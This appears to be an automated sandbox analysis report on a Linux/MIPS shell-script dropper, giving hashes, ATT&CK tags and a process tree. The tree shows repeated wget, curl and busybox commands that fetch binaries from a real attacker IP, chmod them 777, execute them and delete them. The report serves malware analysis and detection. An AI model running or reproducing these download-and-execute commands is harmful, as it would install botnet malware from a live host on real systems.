fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939

Analysis

max time kernel
93s
max time network
95s
platform
debian-9_mips
resource
debian9-mipsbe-20240418-en
resource tags

arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
20/11/2024, 03:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
Size

10KB
MD5

2790535985a336c1e26b994e26754331
SHA1

3c9c3751a3bfd775ab2063c28c7780ddc87e1d9b
SHA256

fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939
SHA512

f2822208fdda3dc5040623c5de5b91212d6e9cde8b7aef05790ed0bf45574dbcb3e0fbe3b0589dc4babd8edf667cef18e76f3ef6d5c295b84391a99bee61b8b3
SSDEEP

96:yl7siIiUiPcEbwC/+LC2OqK0kSnSG+Jpm67Yb6H4kU83qpSG+Jpf/7/tvnsiIiUl:yl7sjPECU4nSG+Jpm6ASG+JpDWjPl

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
940	chmod
946	chmod
952	chmod
958	chmod
976	chmod
835	chmod
898	chmod
916	chmod
766	chmod
822	chmod
876	chmod
910	chmod
922	chmod
964	chmod
772	chmod
904	chmod
970	chmod
982	chmod
988	chmod
1000	chmod
928	chmod
994	chmod
790	chmod
844	chmod
1006	chmod
886	chmod
892	chmod
934	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J	curl
File opened for modification	/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ	curl
File opened for modification	/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ	curl
File opened for modification	/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz	curl
File opened for modification	/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto	curl
File opened for modification	/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC	curl
File opened for modification	/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0	curl
File opened for modification	/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL	curl
File opened for modification	/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0	curl
File opened for modification	/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0	curl
File opened for modification	/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD	curl
File opened for modification	/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ	curl
File opened for modification	/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto	curl
File opened for modification	/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL	curl
File opened for modification	/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J	curl
File opened for modification	/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g	curl
File opened for modification	/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev	curl
File opened for modification	/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD	curl
File opened for modification	/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d	curl
File opened for modification	/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC	curl
File opened for modification	/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev	curl
File opened for modification	/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1	curl
File opened for modification	/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0	curl
File opened for modification	/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g	curl
File opened for modification	/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1	curl
File opened for modification	/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d	curl
File opened for modification	/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ	curl
File opened for modification	/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz	curl

/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
1⤵
PID:735
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:737
- /usr/bin/wget
  wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:741
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:755
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:764
- /bin/chmod
  chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - File and Directory Permissions Modification
  PID:766
- /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  ./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - Executes dropped EXE
  PID:767
- /bin/rm
  rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:768
- /usr/bin/wget
  wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:769
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:770
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:771
- /bin/chmod
  chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - File and Directory Permissions Modification
  PID:772
- /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  ./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - Executes dropped EXE
  PID:773
- /bin/rm
  rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:774
- /usr/bin/wget
  wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:775
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:776
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:784
- /bin/chmod
  chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - File and Directory Permissions Modification
  PID:790
- /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  ./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - Executes dropped EXE
  PID:791
- /bin/rm
  rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:794
- /usr/bin/wget
  wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:796
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:804
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:815
- /bin/chmod
  chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - File and Directory Permissions Modification
  PID:822
- /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  ./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  - Executes dropped EXE
  PID:823
- /bin/rm
  rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
  2⤵
  PID:827
- /usr/bin/wget
  wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:828
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:833
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:834
- /bin/chmod
  chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - File and Directory Permissions Modification
  PID:835
- /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  ./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  - Executes dropped EXE
  PID:836
- /bin/rm
  rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
  2⤵
  PID:837
- /usr/bin/wget
  wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:838
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:839
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:843
- /bin/chmod
  chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - File and Directory Permissions Modification
  PID:844
- /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  ./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  - Executes dropped EXE
  PID:845
- /bin/rm
  rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
  2⤵
  PID:846
- /usr/bin/wget
  wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:847
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:854
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:864
- /bin/chmod
  chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - File and Directory Permissions Modification
  PID:876
- /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  ./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - Executes dropped EXE
  PID:877
- /bin/rm
  rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:880
- /usr/bin/wget
  wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:881
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:884
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:885
- /bin/chmod
  chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - File and Directory Permissions Modification
  PID:886
- /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  ./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - Executes dropped EXE
  PID:887
- /bin/rm
  rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:888
- /usr/bin/wget
  wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:889
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:890
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:891
- /bin/chmod
  chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - File and Directory Permissions Modification
  PID:892
- /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  ./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - Executes dropped EXE
  PID:893
- /bin/rm
  rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:894
- /usr/bin/wget
  wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:895
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:896
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:897
- /bin/chmod
  chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - File and Directory Permissions Modification
  PID:898
- /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  ./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - Executes dropped EXE
  PID:899
- /bin/rm
  rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:900
- /usr/bin/wget
  wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:901
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:902
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:903
- /bin/chmod
  chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - File and Directory Permissions Modification
  PID:904
- /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  ./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - Executes dropped EXE
  PID:905
- /bin/rm
  rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:906
- /usr/bin/wget
  wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:907
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:908
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:909
- /bin/chmod
  chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - File and Directory Permissions Modification
  PID:910
- /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  ./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - Executes dropped EXE
  PID:911
- /bin/rm
  rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:912
- /usr/bin/wget
  wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:913
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:914
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:915
- /bin/chmod
  chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - File and Directory Permissions Modification
  PID:916
- /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  ./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - Executes dropped EXE
  PID:917
- /bin/rm
  rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:918
- /usr/bin/wget
  wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:919
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:920
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:921
- /bin/chmod
  chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - File and Directory Permissions Modification
  PID:922
- /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  ./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - Executes dropped EXE
  PID:923
- /bin/rm
  rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:924
- /usr/bin/wget
  wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:925
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:926
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:927
- /bin/chmod
  chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - File and Directory Permissions Modification
  PID:928
- /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  ./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  - Executes dropped EXE
  PID:929
- /bin/rm
  rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
  2⤵
  PID:930
- /usr/bin/wget
  wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:931
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:932
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:933
- /bin/chmod
  chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - File and Directory Permissions Modification
  PID:934
- /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  ./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  - Executes dropped EXE
  PID:935
- /bin/rm
  rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
  2⤵
  PID:936
- /usr/bin/wget
  wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:937
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:938
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:939
- /bin/chmod
  chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - File and Directory Permissions Modification
  PID:940
- /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  ./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  - Executes dropped EXE
  PID:941
- /bin/rm
  rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
  2⤵
  PID:942
- /usr/bin/wget
  wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:943
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:944
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:945
- /bin/chmod
  chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - File and Directory Permissions Modification
  PID:946
- /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  ./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  - Executes dropped EXE
  PID:947
- /bin/rm
  rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
  2⤵
  PID:948
- /usr/bin/wget
  wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:949
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:950
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:951
- /bin/chmod
  chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - File and Directory Permissions Modification
  PID:952
- /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  ./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  - Executes dropped EXE
  PID:953
- /bin/rm
  rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
  2⤵
  PID:954
- /usr/bin/wget
  wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:955
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:956
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:957
- /bin/chmod
  chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - File and Directory Permissions Modification
  PID:958
- /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  ./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  - Executes dropped EXE
  PID:959
- /bin/rm
  rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
  2⤵
  PID:960
- /usr/bin/wget
  wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:961
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:962
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:963
- /bin/chmod
  chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - File and Directory Permissions Modification
  PID:964
- /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  ./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  - Executes dropped EXE
  PID:965
- /bin/rm
  rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
  2⤵
  PID:966
- /usr/bin/wget
  wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:967
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:968
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:969
- /bin/chmod
  chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - File and Directory Permissions Modification
  PID:970
- /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  ./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  - Executes dropped EXE
  PID:971
- /bin/rm
  rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
  2⤵
  PID:972
- /usr/bin/wget
  wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:973
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:974
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:975
- /bin/chmod
  chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - File and Directory Permissions Modification
  PID:976
- /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  ./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  - Executes dropped EXE
  PID:977
- /bin/rm
  rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
  2⤵
  PID:978
- /usr/bin/wget
  wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:979
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:980
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:981
- /bin/chmod
  chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - File and Directory Permissions Modification
  PID:982
- /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  ./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  - Executes dropped EXE
  PID:983
- /bin/rm
  rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
  2⤵
  PID:984
- /usr/bin/wget
  wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  PID:985
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:986
- /bin/busybox
